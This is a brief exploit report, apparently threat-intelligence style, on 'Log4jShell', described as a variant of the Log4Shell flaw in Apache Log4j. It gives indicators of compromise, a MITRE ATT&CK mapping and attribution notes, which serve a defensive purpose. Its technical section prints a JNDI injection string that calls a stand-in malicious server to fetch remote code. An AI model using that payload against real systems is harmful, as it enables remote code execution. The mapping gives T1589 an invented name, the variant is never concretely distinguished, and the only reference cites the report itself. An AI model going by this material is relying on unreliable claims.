Log4jShell – Distinct Exploit Report

Overview

Log4jShell is a distinct variation of the infamous Log4Shell vulnerability targeting Apache Log4j logging library used in Java applications. This variant demonstrates exploitation techniques and indicators slightly different from CVE-2021-44228.

Technical Details

The Log4jShell variant relies on improper deserialization via JNDI lookups in crafted user input that gets logged. Exploits typically inject:

${jndi:ldap://malicious-server.com/a}

to trigger remote code execution (RCE) within applications using vulnerable Log4j versions.

Indicators of Compromise (IOC)

Presence of ${jndi: patterns in application logs
Outbound connections to suspicious LDAP/RMI endpoints
Artifacts from curl or wget in unusual locations
Execution of unexpected Java classes remotely fetched

MITRE ATT&CK Mapping

T1190: Exploit Public-Facing Application
T1203: Exploitation for Client Execution
T1059: Command and Scripting Interpreter
T1071: Application Layer Protocol (LDAP)
T1589: Domain Trust Abuse for LDAP callback

View this mapping using official MITRE ATT&CK Navigator

Attribution and Context

Log4jShell exploitation has been used in opportunistic and targeted attacks by various threat actors including crypto-mining botnets and advanced persistent threats. Some observed TTPs align with APT35 and Kinsing malware.

External References

Log4jShell – Distinct Log4Shell Variant Exploit Report